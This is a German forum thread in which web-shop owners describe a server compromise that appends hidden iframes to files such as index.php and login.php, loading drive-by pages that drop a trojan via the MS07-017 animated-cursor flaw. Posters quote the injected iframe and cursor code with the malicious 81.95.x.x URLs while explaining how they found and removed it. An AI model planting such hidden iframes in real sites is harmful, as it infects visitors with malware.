Virus gefunden

[DJ-Team-2002]

Hallo,

wir haben ein Problem mit unserem Online-Shop und hoffen das uns hier jemand weiterhelfen kann.
Unsere Site fängt mit einer Extra-Index Seite an und dort hat man dann die Auswahl wohin man möchte. Entweder zur Partysite (ist wo anders hinterlegt) oder zum Shop.

Klickt man nun auf den Shop, so gehts auch normal dorthin....jedenfalls wird die Indexseite des Shops geladen und wenn sie fertig ist kommt unser Virenprogramm und hat einen Trojaner gefunden.

Nach einen Blick in den Datenschutzbericht des Explorers stellt man fest, das anfangs nur Seiten des Shops geladen werden, jedoch zum Schluss noch 3 weitere fremde Seiten:

- http://81.95.149.27/logo/index.php
- http://81.95.149.28/go.php?sid=1
- http://81.95.149.28/try/index.php

Von dort aus wird dann eine Datei auf C:/ abgespeichert welche "Gott sei Dank" von meinem AVG Anti-Virus erkannt und jedesmal gelöscht wird.
Das ist jedoch auf jeden Fall nervig und absolut Kundenfeindlich.

Nun habe ich mir schon einmal gedacht das es evtl. an irgend einem Bild liegt, hatte Sie alle gelöscht, jedoch ohne Erfolg.


Ich hoffe jemand kann weiterhelfen, da ich absolut verzweifelt bin.

Danke schon einmal im voraus.

Achso ja, die Website ist http://www.DJTeam-2002.de


Beste grüße
Thomas

[jens_kaiser]

Wie ich sehe, hast du das gleiche Problem, wie ich auf dem server. Bei mir wird auch in jeder Indexdatei meiner domains dieses inlineframe geschrieben:
<DEFANGED_iframe
> src='http://81.95.149.27/logo/index.php' width='1' height='1'
> style='visibility: hidden;'></iframe>

Auch ich bin verzweifelt, meine Festplatte und das Betriebssystem sind sauber. Panda erkennt solche Trojaner und entfernt sie. Das Problem liegt als serverseitig. Wie hast du das Problem gelößt oder hast du es immer noch. Über eine Antwort wäre ich sehr dankbar, da der Support von 1und1.de das als Lapalie einfach abtun und sich nicht wirklich drum kümmern.
Ich möchte nicht extra meine domains hier veröffentlichen, sonst klickt noch einer drauf, ich habe so schon genug Ärger am Hals.

MfG Jens Kaiser

[wibros]

Hört sich auf jeden Fall nach einer Infektion am Server an. Wenn das ein Root-Server ist, solltest du wissen, was zu tun ist, um das loszuwerden. Ansonsten sollte 1&1 in die Puschen kommen...

[DJ-Team-2002]

Sooooo

juhu


hab endlich meinen Shop wieder sauber.Also wie du schon richtig erkannt hast, hat sich aus was für Gründen auch immer jemand an dem Quelltext zu schaffen gemacht.

Ich habe alle .php Dateien runterkopiert und sie mit Macromedia mir anzeigen lassen....dann habe ich bei 2 dateien am ende ebenfalls diesen netten Hidden-Frame gefunden und ihn gelöscht....die gesäuberte datei wieder hochkopiert und die alte dadurch ersetzt.....das wars....bis heute läuft eigentlich alles ganz easy

Achso ja, bei mir war die index.php und die login.php betroffen


Schon komisch das sich solch Zufälle ergeben.....habe ebenfalls nen hostingpaket bei 1&1.....die sagten mir natürlich auch das bei ihnen alle ok is.....aber wer will schon zugeben das er unsicher ist?

Zumindest die kleinen Hilfsarbeiter da am Telefontischlein bekommen davon auch ncihts mit.


beste Grüße
Tom
so mal schauen ob das weiterhilft....

[franc]

hallo,
auch auf unserm server war plötzlich dieser virus.
es ist der 'ms07-017' der nützt auf windows systemen einen bug seit dez.06 (erst im april 07 mit update bugfixed) sog. ani-lücke, hat was mit cursor zu tun, im schadcode steht dann:
...
style=\"CURSOR: url('http://81.95.149.27/eur/ms07-017.ani'
...
und den schadcode holt sich der virus von russischen servern die mit 81.95. anfangen.
in meinem fall war jeweils in den dateien

admin\index.php
cache\index.html
export\index.html
index.php
login.php
templates_c\index.html

<iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

angehängt. antivir hat das bemängelt, wenn man die seite im IE öffnete (nicht betroffen der FF).
War etwas umständlich den zu finden, weil er sich ja erst bei seitenaufruf lädt und durch einfaches durchsuchen nach ms17-17 nicht zu finden ist (wohl aber durch textsuche nach 81.95.).

wie diese dateien veraendert werden konnten ist mir noch nicht klar, die ftp-logfiles muessen noch geprueft werden (sofern vorhanden, kein direkter serverzugriff).

vielleicht ja aber durch eine luecke in xtcommerce oder php???

wenn ich mehr weiss werde ich es hier posten.

gruss franc

[Doctor Dom]

81.95. usw...ist übrigens in Panama, nicht immer nur die bösen Russen... ;-)

[xaex]

es sind immer entweder die bullen oder die russen..
dumm ist nur wenn man bulle und gleichzeitig russe ist..